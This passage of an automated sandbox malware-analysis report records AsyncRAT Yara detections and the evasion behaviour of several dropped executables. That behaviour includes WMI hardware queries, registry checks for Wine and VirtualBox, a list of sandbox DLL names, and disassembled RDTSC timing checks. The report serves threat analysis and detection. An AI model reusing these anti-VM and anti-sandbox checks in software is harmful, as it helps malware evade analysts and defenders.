Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 11.3.skotes.exe.9d0e9d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.skotes.exe.9d0e9d.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3567702687.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.4044838292.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3567876163.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3761299972.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3763224367.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.4048760844.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: skotes.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: skotes.exe, 0000000B.00000003.3567702687.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000003.4044838292.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000003.3761299972.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000003.4048760844.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3734030557.000001C595C74000.00000004.00000800.00020000.00000000.sdmp, t0IHakP.exe, 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: SBIEDLL.DLL
Source: BitLockerToGo.exe, 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: 978A15 second address: 978A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF1671 second address: AF1678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF1678 second address: AF167F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF167F second address: AF1689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF0810 second address: AF0837 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jc 00007FC750FDC8E6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF0B46 second address: AF0B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF0E18 second address: AF0E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF0E1C second address: AF0E27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC750B60C26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF3FEC second address: AF400C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jnp 00007FC750FDC8E6h 0x00000015 jl 00007FC750FDC8E6h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF400C second address: AF409F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 movzx edx, ax 0x0000000b push 00000000h 0x0000000d or edx, dword ptr [ebp+122D38B0h] 0x00000013 call 00007FC750B60C29h 0x00000018 jmp 00007FC750B60C37h 0x0000001d push eax 0x0000001e jmp 00007FC750B60C39h 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 jnl 00007FC750B60C51h 0x0000002d mov eax, dword ptr [eax] 0x0000002f pushad 0x00000030 pushad 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 push edi 0x00000034 pop edi 0x00000035 popad 0x00000036 jl 00007FC750B60C2Ch 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF409F second address: AF40E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push ecx 0x0000000a push edx 0x0000000b jbe 00007FC750FDC8E6h 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 pop eax 0x00000014 push 00000003h 0x00000016 call 00007FC750FDC8ECh 0x0000001b or ch, FFFFFFEFh 0x0000001e pop esi 0x0000001f push 00000000h 0x00000021 add dword ptr [ebp+122D38BEh], edi 0x00000027 push 00000003h 0x00000029 cld 0x0000002a call 00007FC750FDC8E9h 0x0000002f push ebx 0x00000030 push ebx 0x00000031 js 00007FC750FDC8E6h 0x00000037 pop ebx 0x00000038 pop ebx 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF40E9 second address: AF40ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF40ED second address: AF4141 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC750FDC8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push ecx 0x00000014 push edx 0x00000015 jmp 00007FC750FDC8EDh 0x0000001a pop edx 0x0000001b pop ecx 0x0000001c mov eax, dword ptr [eax] 0x0000001e jmp 00007FC750FDC8F9h 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 push ebx 0x00000029 jmp 00007FC750FDC8EAh 0x0000002e pop ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF4141 second address: AF4145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF425B second address: AF425F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF425F second address: AF426E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF426E second address: AF4272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF4272 second address: AF42E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop eax 0x00000008 or dword ptr [ebp+122D1EA6h], esi 0x0000000e push 00000003h 0x00000010 add ecx, dword ptr [ebp+122D2A41h] 0x00000016 push 00000000h 0x00000018 sub dword ptr [ebp+122D250Bh], edx 0x0000001e push 00000003h 0x00000020 sbb di, 188Ch 0x00000025 sub dword ptr [ebp+122D3740h], ecx 0x0000002b push F2AA136Ah 0x00000030 pushad 0x00000031 jg 00007FC750B60C28h 0x00000037 jmp 00007FC750B60C39h 0x0000003c popad 0x0000003d xor dword ptr [esp], 32AA136Ah 0x00000044 cmc 0x00000045 lea ebx, dword ptr [ebp+1244EE8Bh] 0x0000004b adc ch, 0000000Eh 0x0000004e xchg eax, ebx 0x0000004f pushad 0x00000050 push ebx 0x00000051 push ebx 0x00000052 pop ebx 0x00000053 pop ebx 0x00000054 push edi 0x00000055 pushad 0x00000056 popad 0x00000057 pop edi 0x00000058 popad 0x00000059 push eax 0x0000005a push eax 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF431B second address: AF431F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF431F second address: AF4329 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC750B60C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF4329 second address: AF4369 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC750FDC8E8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ch, BAh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FC750FDC8E8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push FD98B43Fh 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 pushad 0x00000038 popad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF4369 second address: AF436F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF436F second address: AF4373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AF4373 second address: AF43DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 02674C41h 0x0000000f jmp 00007FC750B60C37h 0x00000014 push 00000003h 0x00000016 mov dword ptr [ebp+122D393Ah], edi 0x0000001c push 00000000h 0x0000001e push 00000003h 0x00000020 mov edx, esi 0x00000022 push 64BB15A0h 0x00000027 jl 00007FC750B60C2Ah 0x0000002d push eax 0x0000002e pushad 0x0000002f popad 0x00000030 pop eax 0x00000031 add dword ptr [esp], 5B44EA60h 0x00000038 mov esi, 5A11E091h 0x0000003d lea ebx, dword ptr [ebp+1244EE96h] 0x00000043 mov ecx, dword ptr [ebp+122D2919h] 0x00000049 mov dword ptr [ebp+122D27DBh], ecx 0x0000004f push eax 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 pop esi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AE4AC1 second address: AE4AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AE4AC5 second address: AE4AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AE4AD5 second address: AE4AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FC750FDC8E6h 0x0000000e jmp 00007FC750FDC8F7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AE4AFA second address: AE4B38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C39h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007FC750B60C37h 0x00000014 pop edx 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AE4B38 second address: AE4B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: AE4B3D second address: AE4B47 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC750B60C2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B120FB second address: B12100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B12100 second address: B12122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C2Bh 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a je 00007FC750B60C26h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jne 00007FC750B60C2Eh 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B1254C second address: B12551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B126B1 second address: B126E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750B60C2Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FC750B60C26h 0x00000011 jmp 00007FC750B60C34h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B129AB second address: B129D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC750FDC8E6h 0x0000000a push ebx 0x0000000b jmp 00007FC750FDC8F9h 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B129D2 second address: B129D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B129D8 second address: B129DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B12B40 second address: B12B4E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC750B60C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B12B4E second address: B12B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B12E11 second address: B12E17 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
